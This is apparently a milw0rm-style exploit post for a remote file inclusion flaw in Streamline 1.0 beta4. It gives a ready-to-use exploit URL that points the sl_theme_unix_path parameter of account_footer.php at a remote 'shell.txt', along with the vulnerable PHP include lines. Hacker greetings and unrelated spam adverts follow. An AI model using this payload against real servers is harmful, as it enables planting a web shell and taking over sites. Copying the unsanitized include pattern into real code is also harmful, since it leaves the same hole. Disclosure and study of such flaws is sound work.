Vulnerability Type: Remote File Inclusion
Vulnerable file: /streamline-1.0-beta4/src/core/theme/includes/account_footer.php
Exploit URL: http://localhost/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: sl_theme_unix_path
Line number: 2
Lines:
----------------------------------------------
<?
require_once( $sl_theme_unix_path."/account/footer.php" );
require_once( $sl_theme_unix_path."/common/footer.php" );
----------------------------------------------
GrEeTs To sHaDoW sEcUrItY TeAm & str0ke
FoUnD By BiNgZa
DoRk: :(
shadowcrew@hotmail.co.uk
# milw0rm.xmc.pl [8x16*32^n]
Polish:
Webdeveloper |
Probably the best hosting company Interserver
SEO Shop:
Multi-quality SEO links |
Best Proxy Service.
Group: xmc.pl